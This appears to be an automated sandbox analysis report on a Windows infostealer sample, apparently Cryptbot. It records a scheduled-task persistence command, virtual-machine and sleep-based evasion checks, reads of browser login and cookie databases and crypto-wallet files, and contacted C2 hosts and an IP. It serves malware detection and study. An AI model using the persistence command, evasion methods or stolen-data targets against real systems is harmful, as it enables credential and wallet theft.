Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3304AD push eax; mov dword ptr [esp], ebx 4_2_6C33048A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33A527 push eax; mov dword ptr [esp], ebx 4_2_6C33A53B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C311AAA push eax; mov dword ptr [esp], ebx 4_2_6C3C6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C311AAA push eax; mov dword ptr [esp], ebx 4_2_6C3C6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33A6F7 push eax; mov dword ptr [esp], ebx 4_2_6C33A70B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C316003 push eax; mov dword ptr [esp], ebx 4_2_6C3C6AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C316003 push edx; mov dword ptr [esp], edi 4_2_6C3C6B36
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C316098 push eax; mov dword ptr [esp], ebx 4_2_6C3C6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3440D5 push ecx; mov dword ptr [esp], ebx 4_2_6C3440E9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3381E5 push edx; mov dword ptr [esp], ebx 4_2_6C3381F9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33023B push eax; mov dword ptr [esp], ebx 4_2_6C330251
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\TMdMlTZMAWbrEijBRYMr.dll Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 589 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7516 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8020 Thread sleep count: 589 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8020 Thread sleep time: -58900s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: file.exe Binary or memory string: VMware
Source: file.exe, 00000000.00000003.1781292878.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1859884995.00000000010DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375435758.00000000010DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768676819.00000000010E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2375435758.000000000109E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_00538230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 4_2_00538230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_0053116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 4_2_0053116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_00531160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 4_2_00531160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_005311A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 4_2_005311A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_005313C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 4_2_005313C9
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C378280 cpuid 4_2_6C378280
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 4.2.service123.exe.6c2f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2351645168.0000000004495000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: service123.exe PID: 8016, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: file.exe PID: 7432, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe String found in binary or memory: Electrum
Source: file.exe String found in binary or memory: \ElectronCash\wallets
Source: file.exe String found in binary or memory: com.liberty.jaxx
Source: file.exe String found in binary or memory: \Exodus\backup
Source: file.exe String found in binary or memory: exodus
Source: file.exe String found in binary or memory: Ethereum (UTC)
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7432, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Cryptbot
Source: Yara match File source: Process Memory Space: file.exe PID: 7432, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532996 Sample: file.exe Startdate: 14/10/2024 Architecture: WINDOWS Score: 100 28 sevtbv17pn.top 2->28 36 Suricata IDS alerts for network traffic 2->36 38 Found malware configuration 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 6 other signatures 2->42 8 file.exe 4 2->8         started        13 service123.exe 2->13         started        15 service123.exe 2->15         started        signatures3 process4 dnsIp5 30 sevtbv17pn.top 80.66.81.78, 49730, 49731, 49734 TEAM-HOSTASRU Russian Federation 8->30 24 C:\Users\user\AppData\...\service123.exe, PE32 8->24 dropped 26 C:\Users\user\...\TMdMlTZMAWbrEijBRYMr.dll, PE32 8->26 dropped 44 Uses schtasks.exe or at.exe to add and modify task schedules 8->44 46 Tries to harvest and steal browser information (history, passwords, etc) 8->46 48 Drops large PE files 8->48 17 service123.exe 8->17         started        20 schtasks.exe 1 8->20         started        file6 signatures7 process8 signatures9 32 Found evasive API chain (may stop execution after checking mutex) 17->32 34 Found stalling execution ending in API Sleep call 17->34 22 conhost.exe 20->22         started        process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
80.66.81.78
 sevtbv17pn.top Russian Federation
202984 TEAM-HOSTASRU true

Contacted Domains

Name IP Active
sevtbv17pn.top 80.66.81.78 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
@sevtbv17pn.top true
    		unknown
    analforeverlovyu.top true
    • URL Reputation: safe
    		 unknown
    pn.top true
      		unknown
      0asevtbv17pn.top true
        		unknown
        n.top true unknown
        +sevtbv17pn.top true
          		unknown
          sevtbv17pn.top true
            		unknown